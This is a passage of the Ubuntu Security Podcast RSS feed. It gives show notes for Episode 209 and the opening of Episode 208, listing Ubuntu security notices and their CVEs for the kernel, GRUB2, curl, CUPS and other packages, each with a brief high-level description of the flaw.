<li><a href="https://ubuntu.com/security/CVE-2023-35829">CVE-2023-35829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33288">CVE-2023-33288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32248">CVE-2023-32248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23004">CVE-2023-23004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0597">CVE-2023-0597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48502">CVE-2022-48502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Microsoft Azure CVM cloud systems - 5.15</li>
</ul>
<h3 id="usn-6348-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6348-1">USN-6348-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21400">CVE-2023-21400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Raspi on 22.04 / Intel-IoTG on 20.04</li>
</ul>
<h3 id="usn-6349-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6349-1">USN-6349-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 Azure</li>
</ul>
<h3 id="usn-6350-1-usn-6351-1-usn-6339-2-usn-6339-3-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6350-1">USN-6350-1</a>, <a href="https://ubuntu.com/security/notices/USN-6351-1">USN-6351-1</a>, <a href="https://ubuntu.com/security/notices/USN-6339-2">USN-6339-2</a>, <a href="https://ubuntu.com/security/notices/USN-6339-3">USN-6339-3</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38429">CVE-2023-38429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38428">CVE-2023-38428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38426">CVE-2023-38426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3212">CVE-2023-3212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48425">CVE-2022-48425</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15
<ul>
<li>Oracle, AWS, GKE, Raspi, Azure on 22.04</li>
<li>IBM, Oracle, AWS, GKE, Azure on 20.04</li>
</ul>
</li>
</ul>
<h3 id="usn-6340-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6340-2">USN-6340-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 Xilinx ZyncMP, GKEOP, Raspi on 20.04; Raspi, GCP, Azure on 18.04 (Ubuntu Pro)</li>
</ul>
<h3 id="usn-6342-2-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6342-2">USN-6342-2</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 Azure on all</li>
</ul>
<h3 id="usn-6338-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6338-2">USN-6338-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38429">CVE-2023-38429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38428">CVE-2023-38428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38426">CVE-2023-38426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32258">CVE-2023-32258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32257">CVE-2023-32257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32252">CVE-2023-32252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32247">CVE-2023-32247</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2
<ul>
<li>Starfive, IBM, Oracle, GCP on 23.04</li>
<li>GCP on 22.04</li>
</ul>
</li>
</ul>
<h3 id="usn-6357-1-linux-kernel--ibm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6357-1">USN-6357-1</a>] Linux kernel (IBM) vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 IBM on 20.04 / 18.04</li>
</ul>
<h3 id="usn-6345-1-sox-vulnerability--02-42">[<a href="https://ubuntu.com/security/notices/USN-6345-1">USN-6345-1</a>] SoX vulnerability (02:42)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32627">CVE-2023-32627</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Floating point exception via crafted content -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-6352-1-apache-shiro-vulnerabilities--03-03">[<a href="https://ubuntu.com/security/notices/USN-6352-1">USN-6352-1</a>] Apache Shiro vulnerabilities (03:03)</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-17510">CVE-2020-17510</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13933">CVE-2020-13933</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two different authentication bypasses for crafted HTTP requests - not great to
have in a component whose purpose is to to authentication, authorisation,
cryptopraphy and session management</li>
</ul>
<h3 id="usn-6353-1-plib-vulnerability--03-25">[<a href="https://ubuntu.com/security/notices/USN-6353-1">USN-6353-1</a>] PLIB vulnerability (03:25)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38714">CVE-2021-38714</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Portable games library - aims to work across a range of HW and OSes - used by
torcs and flightgear</li>
<li>Integer overflow -&gt; buffer overflow on crafted TGA file</li>
</ul>
<h3 id="usn-6354-1-python-vulnerability--03-54">[<a href="https://ubuntu.com/security/notices/USN-6354-1">USN-6354-1</a>] Python vulnerability (03:54)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48565">CVE-2022-48565</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XML eXternal Entity when parsing XML plist files - fix was to reject entity
declarations in plist files - this is consistent with the behaviour in Apple&rsquo;s
plutil tool as well</li>
</ul>
<h3 id="usn-6355-1-grub2-vulnerabilities--04-14">[<a href="https://ubuntu.com/security/notices/USN-6355-1">USN-6355-1</a>] GRUB2 vulnerabilities (04:14)</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3775">CVE-2022-3775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28737">CVE-2022-28737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28736">CVE-2022-28736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28735">CVE-2022-28735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28734">CVE-2022-28734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28733">CVE-2022-28733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3981">CVE-2021-3981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3697">CVE-2021-3697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3696">CVE-2021-3696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3695">CVE-2021-3695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various grub vulns - see <a href="/episode-121/#usn-4992-1-grub-2-vulnerabilities-03-33">[USN-4992-1] GRUB 2 vulnerabilities from Episode 121</a>
for the previous lot - these updates were published back in February to the
-updates pocket and have now been synced to -security</li>
<li>various OOB R/W via crafted images (Daniel Axtens), integer overflow when
parsing crafted IP packets -&gt; buffer overflow, OOB write via crafted HTTP
header, UAF in chainloader and more</li>
</ul>
<h3 id="usn-6356-1-opendmarc-vulnerabilities--05-08">[<a href="https://ubuntu.com/security/notices/USN-6356-1">USN-6356-1</a>] OpenDMARC vulnerabilities (05:08)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12460">CVE-2020-12460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12272">CVE-2020-12272</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Open Source implementation of the DMARC specification</li>
<li>Possible to inject authentication results via a crafted domain</li>
<li>1-byte heap buffer overflow of a NUL-byte - likely just crash -&gt; DoS</li>
</ul>
<h3 id="usn-6164-2-c-ares-vulnerabilities--05-39">[<a href="https://ubuntu.com/security/notices/USN-6164-2">USN-6164-2</a>] c-ares vulnerabilities (05:39)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32067">CVE-2023-32067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31130">CVE-2023-31130</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-199/#usn-6164-1-c-ares-vulnerabilities--09-24">[USN-6164-1] c-ares vulnerabilities from Episode 199</a></li>
</ul>
<h3 id="usn-6237-3-curl-vulnerabilities--05-50">[<a href="https://ubuntu.com/security/notices/USN-6237-3">USN-6237-3</a>] curl vulnerabilities (05:50)</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32001">CVE-2023-32001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28322">CVE-2023-28322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28321">CVE-2023-28321</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-203/#usn-6237-1-curl-vulnerabilities--08-45">[USN-6237-1] curl vulnerabilities from Episode 203</a></li>
</ul>
<h3 id="usn-6359-1-file-vulnerability--06-01">[<a href="https://ubuntu.com/security/notices/USN-6359-1">USN-6359-1</a>] file vulnerability (06:01)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48554">CVE-2022-48554</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>stack-based buffer over-read -&gt; crash, DoS</li>
</ul>
<h3 id="usn-6360-1-flac-vulnerability--06-18">[<a href="https://ubuntu.com/security/notices/USN-6360-1">USN-6360-1</a>] FLAC vulnerability (06:18)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-22219">CVE-2020-22219</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>buffer overflow -&gt; RCE / crash</li>
</ul>
<h3 id="usn-6361-1-cups-vulnerability--06-27">[<a href="https://ubuntu.com/security/notices/USN-6361-1">USN-6361-1</a>] CUPS vulnerability (06:27)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32360">CVE-2023-32360</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Default configuration failed to require authentication for the
<code>CUPS-Get-Document</code> operation - could allow other users to fetch print documents
without authentication</li>
</ul>
<h3 id="usn-6362-1-dot-net-vulnerability--06-46">[<a href="https://ubuntu.com/security/notices/USN-6362-1">USN-6362-1</a>] .NET vulnerability (06:46)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36799">CVE-2023-36799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS in X509 certs handling</li>
</ul>
<h3 id="usn-6358-1-redcloth-vulnerability--06-52">[<a href="https://ubuntu.com/security/notices/USN-6358-1">USN-6358-1</a>] RedCloth vulnerability (06:52)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31606">CVE-2023-31606</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS via crafted HTML payload - upstream maintainer hasn&rsquo;t responded to the
original report or to the PR with the proposed fix - one of the rare occasions
where we deploy a fix that is not blessed by upstream - also demonstrates
though that we try and maintain the software in Ubuntu even when upstream
stops supporting it (whether officially or not)</li>
</ul>
<h3 id="usn-6363-1-curl-vulnerability--08-03">[<a href="https://ubuntu.com/security/notices/USN-6363-1">USN-6363-1</a>] curl vulnerability (08:03)</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38039">CVE-2023-38039</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Provides an API to access headers from past HTTP responses - so stores headers
in memory, but failed to limit how large this could be - so if a malicious
server provided a response with a very large header then could DoS the
application using libcurl - limited to 300KB total per response - which is
similar to how Chrome behaves</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="part-4-of-andrei-s-deep-dive-into-cybersecurity-research">Part 4 of Andrei&rsquo;s deep dive into cybersecurity research ()</h3>
<p>“Shedding Light on CVSS Scoring Inconsistencies: A User-Centric Study on
Evaluating Widespread Security Vulnerabilities” - to appear in IEEE Symposium on
Security &amp; Privacy (aka S&amp;P) in 2024</p>
<ul>
<li>Tries to answer the questions &ldquo;Are CVSS evaluations consistent?&rdquo; and &ldquo;Which
factors influence CVSS assessments?&rdquo;</li>
<li><a href="https://arxiv.org/abs/2308.15259">https://arxiv.org/abs/2308.15259</a></li>
<li><a href="https://www.first.org/cvss/specification-document">https://www.first.org/cvss/specification-document</a></li>
<li><a href="https://www.first.org/cvss/user-guide">https://www.first.org/cvss/user-guide</a></li>
<li><a href="https://www.first.org/cvss/examples">https://www.first.org/cvss/examples</a></li>
<li><a href="https://www.first.org/cvss/examples#OpenSSL-Heartbleed-Vulnerability-CVE-2014-0160">https://www.first.org/cvss/examples#OpenSSL-Heartbleed-Vulnerability-CVE-2014-0160</a></li>
<li><a href="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator">https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator</a></li>
<li><a href="https://ubuntu.com/blog/securing-open-source-through-cve-prioritisation">https://ubuntu.com/blog/securing-open-source-through-cve-prioritisation</a></li>
</ul>
<h3 id="ubuntu-updates-releases-and-repositories-explained--22-18">Ubuntu updates, releases and repositories explained (22:18)</h3>
<ul>
<li><a href="https://ubuntu.com/blog/ubuntu-updates-releases-and-repositories-explained">https://ubuntu.com/blog/ubuntu-updates-releases-and-repositories-explained</a></li>
<li>by Aaron Whitehouse - Senior Public Cloud Enablement Director at Canonical,
leads the team that drives Canonical&rsquo;s joint initiatives with the major
public clouds</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li>Come find us in person at <a href="https://events.linuxfoundation.org/linux-security-summit-europe/">LSS EU 2023 in Bilbao, Spain</a></li>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E209.mp3" length="39797603" type="audio/mpeg" /><itunes:duration>1489</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 208
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-208/</link>
          <pubDate>Fri, 08 Sep 2023 23:18:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>0bd90d58927dbcaef57df7c9cd3d593aceb0876a1966debff0f8cf0254e59e562db53e2c75acff041dcbf4a2c6b11f9851fac080e5e4c4a120ab18e08f8c1af4</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 208</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we detail the recently announced and long-awaited feature of
  TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we
  cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry
  and...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we detail the recently announced and long-awaited feature of
  TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we
  cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry
  and more.
  </itunes:summary>
        <description>  This week we detail the recently announced and long-awaited feature of
  TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we
  cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry
  and more.
  </description>
        <googleplay:description>  This week we detail the recently announced and long-awaited feature of
  TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we
  cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry
  and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we detail the recently announced and long-awaited feature of
TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we
cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry
and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>93 unique CVEs addressed</p>
<h3 id="usn-6322-1-elfutils-vulnerabilities--00-38">[<a href="https://ubuntu.com/security/notices/USN-6322-1">USN-6322-1</a>] elfutils vulnerabilities (00:38)</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33294">CVE-2021-33294</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21047">CVE-2020-21047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7665">CVE-2019-7665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7150">CVE-2019-7150</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7149">CVE-2019-7149</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18521">CVE-2018-18521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18520">CVE-2018-18520</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18310">CVE-2018-18310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16403">CVE-2018-16403</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16062">CVE-2018-16062</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All the older CVEs (2018-2019) for Ubuntu 14.04 only - and all of these are
just DoS through OOB read / NULL ptr deref etc</li>
<li>OOB write / off-by-one + CPU-based DoS as well for more recent releases -&gt;
